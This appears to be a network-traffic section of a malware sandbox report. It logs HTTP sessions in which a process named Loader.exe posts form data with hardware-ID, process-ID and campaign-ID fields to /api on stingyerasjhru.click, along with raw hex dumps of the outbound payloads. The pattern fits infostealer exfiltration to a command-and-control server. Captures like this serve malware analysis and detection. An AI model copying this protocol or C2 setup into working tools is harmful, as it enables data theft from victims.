2024-12-31 16:42:29 UTC	1369	IN	Data Raw: 41 74 4b 71 63 71 77 64 63 79 64 33 64 6b 34 45 62 42 5a 6c 4c 34 63 4f 36 4e 33 49 68 32 44 43 33 7a 51 43 64 59 45 6b 77 76 7a 4d 33 71 43 68 36 49 2b 32 39 72 31 70 30 46 49 37 68 53 4a 2b 51 5a 62 34 32 38 73 49 72 34 79 62 73 55 4c 6b 69 47 47 48 72 64 4e 43 75 65 53 37 32 4f 56 2f 4d 47 4a 62 55 33 35 57 36 62 35 55 6e 69 6b 4e 32 38 59 77 46 30 2f 35 78 62 64 41 6f 73 50 39 69 78 4f 74 34 65 67 50 4a 66 39 7a 49 39 6a 41 72 42 5a 69 72 34 63 4f 2b 56 7a 50 78 47 50 41 6a 50 46 41 64 64 48 79 30 69 36 54 52 7a 6e 69 36 55 72 32 4e 4c 4d 31 57 5a 4d 38 46 6d 5a 73 46 30 37 38 6a 6c 33 54 38 35 46 62 59 4a 44 6b 45 43 47 47 71 59 4c 52 37 47 4a 36 41 58 72 38 4e 6d 65 63 45 47 38 4b 49 76 36 55 6d 37 6e 61 53 67 69 76 69 68 74 78 51 76 54 52 62 51 65 Data Ascii: AtKqcqwdcyd3dk4EbBZlL4cO6N3Ih2DC3zQCdYEkwvzM3qCh6I+29r1p0FI7hSJ+QZb428sIr4ybsULkiGGHrdNCueS72OV/MGJbU35W6b5UnikN28YwF0/5xbdAosP9ixOt4egPJf9zI9jArBZir4cO+VzPxGPAjPFAddHy0i6TRzni6Ur2NLM1WZM8FmZsF078jl3T85FbYJDkECGGqYLR7GJ6AXr8NmecEG8KIv6Um7naSgivihtxQvTRbQe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49757	172.67.157.249	443	1980	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:42:30 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HYH221AA6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20490 Host: stingyerasjhru.click
2024-12-31 16:42:30 UTC	15331	OUT	Data Raw: 2d 2d 48 59 48 32 32 31 41 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 48 59 48 32 32 31 41 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 59 48 32 32 31 41 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 48 59 48 32 32 31 41 41 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --HYH221AA6Content-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--HYH221AA6Content-Disposition: form-data; name="pid"2--HYH221AA6Content-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--HYH221AA6Content-D
2024-12-31 16:42:30 UTC	5159	OUT	Data Raw: 9a d6 c6 af b2 d2 c3 4f 74 3a 9a 3a 3e 33 de c8 f0 99 53 73 e3 e7 d9 70 93 b2 13 ce 1d 3b 9b 5e 5e 9e 53 4e a6 e7 ce 56 87 79 72 93 81 b7 6e 36 61 76 88 9f 71 a0 bf ad 5a e8 36 1a 36 a9 1b 99 b3 79 00 7b 16 0a ba e5 b4 8f 87 af 4d 07 78 8e 3e e3 6b 95 4c 36 90 92 a9 a3 b1 52 49 d4 c6 23 b1 70 7e 3e 15 79 ec fc dc fc 62 64 45 bb 1c f1 86 96 72 41 c9 46 b4 b8 9a 8c 11 92 62 dd b1 64 82 ad 90 34 9b 76 8b b2 49 b7 4c 5c c9 c6 b2 b1 c8 f6 e1 e8 f4 71 db aa 55 97 58 ad 90 63 47 1c 3f c6 0a dd 19 e2 96 73 6f ea 49 c6 67 1f b5 d8 a8 84 8f 5d 59 a2 38 35 93 df 86 77 ae 5c 97 c8 33 35 b7 7c 86 b0 7e 5e 8e 0d 4a b3 b1 4c 2a ad a4 f3 85 38 ab 73 0a 29 76 ee 2c 51 b3 f1 44 56 a5 4a ba 98 49 25 e2 e9 44 42 8d 26 c6 d9 ac 64 8e ef 5e 1e e4 b9 70 b6 95 80 8d 93 b6 25 df Data Ascii: Ot::>3Ssp;^^SNVyrn6avqZ66y{Mx>kL6RI#p~>ybdErAFbd4vIL\qUXcG?soIg]Y85w\35\|~^JL*8s)v,QDVJI%DB&d^p%
2024-12-31 16:42:31 UTC	1145	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:42:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k32mkomm6hddj3eb15june2abc; expires=Sat, 26 Apr 2025 10:29:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J46yaisDFXJjGnK4ukKAugATr%2F0O%2BioR5lIzrDmjjLUJe5x2KJov%2BIPBIw5%2BbrMwKVK9iMeY1kmEWBWzbZVKAkLkMDjgLh4u8n39RKZfiJwsRI1dcxac8Di2Re4QG%2FNSJrFBvhWZeQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb922a98609aa-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129395&min_rtt=129321&rtt_var=27403&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2852&recv_bytes=21447&delivery_rate=29553&cwnd=252&unsent_bytes=0&cid=8c2382703abc22d1&ts=920&x=0"
2024-12-31 16:42:31 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 0d 0a Data Ascii: 12ok 102.129.153.238
2024-12-31 16:42:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49758	172.67.157.249	443	1980	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:42:31 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VS3FTQUB1ATL6UQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 10923 Host: stingyerasjhru.click
2024-12-31 16:42:31 UTC	10923	OUT	Data Raw: 2d 2d 56 53 33 46 54 51 55 42 31 41 54 4c 36 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 56 53 33 46 54 51 55 42 31 41 54 4c 36 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 53 33 46 54 51 55 42 31 41 54 4c 36 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 56 53 Data Ascii: --VS3FTQUB1ATL6UQContent-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--VS3FTQUB1ATL6UQContent-Disposition: form-data; name="pid"2--VS3FTQUB1ATL6UQContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--VS
2024-12-31 16:42:32 UTC	1140	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:42:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nc56btvp43vrof822k1uk4ud5h; expires=Sat, 26 Apr 2025 10:29:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78m6IWfFn12JWA6wWB2ne3Nr5MIq%2FfffJin00kOYvR57RDRcNvfgN0Yu7VJ1ee%2BHO73S6jA3C7oHN1qFkdXjPifUvKLfk7hI4ugsUusHwV%2FbwPkVEYbj1bxOVWqWxAu5tP0EwnZHQQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb92b4d97a530-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129109&min_rtt=128929&rtt_var=27478&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2852&recv_bytes=11864&delivery_rate=29572&cwnd=252&unsent_bytes=0&cid=3a68ac95c395a8e5&ts=867&x=0"
2024-12-31 16:42:32 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 0d 0a Data Ascii: 12ok 102.129.153.238
2024-12-31 16:42:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49759	172.67.157.249	443	1980	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:42:32 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=633ISA4X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20510 Host: stingyerasjhru.click
2024-12-31 16:42:32 UTC	15331	OUT	Data Raw: 2d 2d 36 33 33 49 53 41 34 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 36 33 33 49 53 41 34 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 33 33 49 53 41 34 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 36 33 33 49 53 41 34 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --633ISA4XContent-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--633ISA4XContent-Disposition: form-data; name="pid"3--633ISA4XContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--633ISA4XContent-Dispo
2024-12-31 16:42:32 UTC	5179	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 5c 6f 74 98 5e f7 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a b7 29 3a 4c af fb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d eb 8d 0e d3 eb be 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 36 45 87 e9 75 df 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 bd d1 61 7a dd 77 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc a6 e8 30 bd ee bb 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: \ot^:):Ln`X6Eusazw0
2024-12-31 16:42:33 UTC	1139	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:42:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jk7mejqs3aa2ski013e473q3ns; expires=Sat, 26 Apr 2025 10:29:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YV2UsH3B0P8D3xJxNbQg0vFBMVduHUUHwV90jbtXzRk9w7mhQ1qPiEIn8nBVG1Vdf10Jh56LhMQKJze55bSOxKSwxYSpZyA1CCtENkBFoYtW1nafTRdksh6C7aNuv%2B8%2FyfClHW58YA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb9342c94d9e1-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=128750&min_rtt=128444&rtt_var=27568&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2853&recv_bytes=21466&delivery_rate=29592&cwnd=252&unsent_bytes=0&cid=4aee51b3c61accd0&ts=744&x=0"
2024-12-31 16:42:33 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 0d 0a Data Ascii: 12ok 102.129.153.238
2024-12-31 16:42:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49760	172.67.157.249	443	1980	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:42:34 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KZ6WSVI09ZW9F User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1237 Host: stingyerasjhru.click
2024-12-31 16:42:34 UTC	1237	OUT	Data Raw: 2d 2d 4b 5a 36 57 53 56 49 30 39 5a 57 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 4b 5a 36 57 53 56 49 30 39 5a 57 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 5a 36 57 53 56 49 30 39 5a 57 39 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 4b 5a 36 57 53 56 49 30 Data Ascii: --KZ6WSVI09ZW9FContent-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--KZ6WSVI09ZW9FContent-Disposition: form-data; name="pid"1--KZ6WSVI09ZW9FContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--KZ6WSVI0
2024-12-31 16:42:35 UTC	1148	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i0do7nic1t3j1urgdnkra3klnb; expires=Sat, 26 Apr 2025 10:29:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FzO%2FIdgUBerfEy%2BZA4biA2UORXVwzzXjvfXzoUDz%2F%2FjWtwD%2BvLjZvY5zb91iqfdWdOZpAPbqEvkTegg31eztloqSg%2BGY4klGzOV8QcHZmaX076vVUnX49OrhSjX4ewhbs%2FcEnhasiw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb93e7e9ba4b8-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129388&min_rtt=129291&rtt_var=27420&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2852&recv_bytes=2153&delivery_rate=29547&cwnd=252&unsent_bytes=0&cid=7d4d9ddd352e853b&ts=699&x=0"
2024-12-31 16:42:35 UTC	24	IN	Data Raw: 31 32 0d 0a 6f 6b 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 0d 0a Data Ascii: 12ok 102.129.153.238
2024-12-31 16:42:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49761	172.67.157.249	443	1980	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:42:36 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=35BJGYNIRP2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1079788 Host: stingyerasjhru.click
2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: 2d 2d 33 35 42 4a 47 59 4e 49 52 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 33 36 30 43 41 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 0d 0a 2d 2d 33 35 42 4a 47 59 4e 49 52 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 35 42 4a 47 59 4e 49 52 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 33 35 42 4a 47 59 4e 49 52 50 32 0d 0a 43 Data Ascii: --35BJGYNIRP2Content-Disposition: form-data; name="hwid"503360CAB129FD4CDB71E32F12885CB3--35BJGYNIRP2Content-Disposition: form-data; name="pid"1--35BJGYNIRP2Content-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--35BJGYNIRP2C
2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: 4f 05 25 86 41 c9 16 b3 93 8d 09 49 43 d4 db b3 4f 97 fb 34 47 6a f8 5e e7 70 85 7e 9f 24 bd 43 8e 21 27 ca fb 7b 59 a7 af df 21 52 51 b9 8d 03 4b 13 a3 9f 78 59 11 f1 2c 22 ec c8 fa a8 28 5f a9 d8 6e 77 b9 02 fe 5a d5 35 08 5f 87 f2 ab dd f2 00 65 89 d1 30 f4 c9 53 b9 a5 3b a9 5c 12 30 10 e8 7d 8e 71 64 90 48 43 86 bd 4d 9d b9 66 0f 0d ba 79 f9 07 de e1 a2 b8 8c cb ee 2b 29 62 37 51 ad 6f 0d 5c c4 be 50 2e f7 6f 3d 92 b6 bb ae 51 11 5b 60 16 fd 63 39 f6 25 eb 16 10 2c 2e 42 fe 3e b5 d8 34 3c 85 ce c5 33 13 06 8d 87 f6 2a c7 38 7b 97 0a 04 57 7f 01 05 63 0f d2 8b 19 2c ee 99 cd 4f 9b ac 0b c0 76 bf 08 51 f5 0f 89 ed 01 28 b1 09 d8 be bf 98 3e 4c 31 3f 47 17 21 04 c5 04 81 a9 fc 0c d3 68 7a 86 ee 62 95 09 b0 ef f9 01 7b 95 50 82 f5 14 8c 1a 11 73 12 44 b7 Data Ascii: O%AICO4Gj^p~$C!'{Y!RQKxY,"(_nwZ5_e0S;\0}qdHCMfy+)b7Qo\P.o=Q[`c9%,.B>4<3*8{Wc,OvQ(>L1?G!hzb{PsD
2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: 38 03 a3 7c c2 fb ed 3a c0 9e 53 75 1d 05 26 63 c9 77 62 ab d2 d4 4d f6 c5 e9 19 9b b9 56 35 c5 4e 1e 7b 37 c3 81 38 d9 02 d3 a4 bc 5a 4e 19 2f 6e 30 d6 ef 20 ce 7a 9e 53 66 b9 b6 68 7d 5a 6f 3d 53 f3 e0 4a 40 06 72 2e 4d e8 16 79 a7 be a9 04 95 de d0 14 dd 35 10 4b 98 cb 20 4f c4 d8 da c5 dd 44 ea 94 4f 01 44 75 b8 8c 00 24 de 1e da ba e3 ba ad ad f0 d6 1c f2 1f 79 92 2a c0 57 1e 91 45 ef fe f7 fa 06 47 00 3a 9e 10 7e 63 fa bf f6 79 13 db fb 4f 76 31 fe e5 3f 93 5b ae f1 3d 6c f3 44 86 0c f0 f5 5e 3d 7a 29 b4 59 63 e5 23 af d9 58 68 5b d1 23 1f 56 9f 82 52 b4 6b f3 60 1c 03 d2 5a 88 dc 8f d6 5b 10 6a 48 8f cf 3c 5e 8c 2e 27 ad bc 75 14 48 43 1a 7f 7e cb 80 c7 5d 00 72 50 ed ef 02 57 dd 8d 3d 8b 2a a8 c6 4d c4 2d e7 ac 33 c1 42 71 4e c9 80 5c 46 45 65 9f Data Ascii: 8\|:Su&cwbMV5N{78ZN/n0 zSfh}Zo=SJ@r.My5K ODODu$yWEG:~cyOv1?[=lD^=z)Yc#Xh[#VRk`Z[jH<^.'uHC~]rPW=M-3BqN\FEe
2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: b4 02 27 3a bd 5b b2 96 d5 6c 7f fd 43 59 6c b5 3c f5 d8 41 9d bd d4 b8 ee 95 fa ac ce b5 a8 9b dc 18 bf ab 00 24 fe ea aa ef 42 0c 5c 62 6f a1 2e fc 4f 74 87 f2 d7 e3 2f f4 39 00 01 71 02 bf 86 cd 15 1e 71 c5 20 b5 67 cf 83 26 00 34 46 af 9f 73 5f 20 c6 03 52 76 36 d3 b0 f4 52 81 df 1c 49 be ed e4 83 1e 15 af 34 7d d0 29 a4 8c 5e f2 9f 0e 48 44 3d 6c 06 7c ef eb 8c e9 91 ca da 5e 30 3d 3a 17 18 31 98 50 17 f1 8a b9 f0 4c b1 f4 63 95 4c 7f b2 c5 35 17 00 63 df fa 34 ab 35 16 30 b1 6f 76 05 91 ab 9d 8a 6a 0c 1e ba fd d9 8f d8 80 41 11 09 b6 8e c2 d6 51 a7 82 40 78 50 47 4a e8 6b f1 3d d8 97 e2 39 18 3d 30 ee 73 4f ee 9d ba 3e 95 b1 12 dc 5f 83 9a 26 e5 ad 15 37 fa 7b 9d 90 37 02 32 0d d0 0e d9 9e 47 2a c2 bb c1 a3 66 c9 0e db 2e 8c 8d 37 9e 55 a1 cf 49 59 Data Ascii: ':[lCYl<A$B\bo.Ot/9qq g&4Fs_ Rv6RI4})^HD=l\|^0=:1PLcL5c450ovjAQ@xPGJk=9=0sO>_&7{72G*f.7UIY
2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: 32 77 e1 a9 d2 ce 34 35 b8 dc f0 0c 6e 5f bc c4 d8 53 30 6d 45 f3 2d df 37 23 5f 93 c0 c8 01 16 0a 9b 2b f7 9e c9 ce e2 85 71 29 a0 d1 88 95 00 d7 a8 8e 36 c9 4e a5 fa cd 0c 0d 86 f2 9e 40 40 84 f7 54 1a 94 cd ac f0 01 6e 56 5f a4 25 b7 4e 62 0c 0b c5 a1 ce b3 ba 0b 29 6e 3e 08 08 6b cd e9 f7 80 99 0f e5 38 96 39 be c5 36 0a 2e 96 60 48 bd fd 21 4f f3 4d 54 4b 1f 38 9e f7 7a 72 c5 4c 10 f1 1f 10 0d d8 1d d9 4d f7 94 ad 1f 1c dc 5e 9e 1e 5c fd 38 62 5b fe c8 0e 43 57 28 e7 fe 1d 03 9b 4e 48 89 71 2f f0 c2 4f 82 e3 39 00 2b b2 c8 ad f0 4c b8 3e b7 8a 24 54 73 f7 88 16 b7 63 9b 49 49 1a bb 0d 75 05 b1 e2 05 09 1a 79 7e 50 1b 92 1a 0a c3 d9 ae b5 c9 a6 46 71 ef 22 4e 62 89 15 a0 5a 91 7a ee 8a 67 cc ea dc 90 69 ff 90 c8 03 c7 d6 f4 84 cc ec f9 97 b4 02 9c 69 Data Ascii: 2w45n_S0mE-7#_+q)6N@@TnV_%Nb)n>k896.`H!OMTK8zrLM^\8b[CW(NHq/O9+L>$TscIIuy~PFq"NbZzgii
2024-12-31 16:42:36 UTC	15331	OUT	Data Raw: 53 d4 63 cb 71 27 d4 1c ca 89 03 54 af 75 71 dc 8d 59 b9 5a b6 b0 c5 db 6d 4f 1b 40 e2 90 20 1c ed b4 3d 6e 58 85 7f 59 10 93 a6 51 41 ef 18 f0 12 85 84 f7 7c ab 5e c8 d8 bc 72 57 a4 58 b6 4c ae eb c2 f0 ed 2f c3 ec ed b7 df 43 6c 9a 49 8a 94 d5 30 c2 f2 80 7f 5d 45 48 9f bd 52 17 6c c3 7a 16 f5 f5 ea d8 df 32 d1 ed 21 d0 d5 b7 bb cd 52 4e 19 a8 5e 9a 0b a8 29 c9 43 b6 63 f0 ae f2 14 fa b2 3b b4 43 56 21 e9 eb cf 93 d5 2e af 07 e0 29 d6 19 1a 25 a9 c6 83 a6 25 3f 2c 42 df 8e 42 77 05 5f 1b 37 bd f6 c0 d1 32 0b e2 f7 ed 76 6e e6 b6 46 d7 d8 8a 0b 5a 43 04 b5 da b0 f8 1d f4 2b b8 cf b1 82 8e 05 fa 35 59 83 af 07 cc 3f 8c da 8d a0 b3 74 af c3 71 be 59 3a 72 dd d0 2d 8b 19 db 77 74 a7 41 8b 87 93 d8 fc a2 9c a6 c6 6a 7b b0 da e7 90 ab ba be 7f 2d 15 76 e8 59 Data Ascii: Scq'TuqYZmO@ =nXYQA\|^rWXL/ClI0]EHRlz2!RN^)Cc;CV!.)%%?,BBw_72vnFZC+5Y?tqY:r-wtAj{-vY
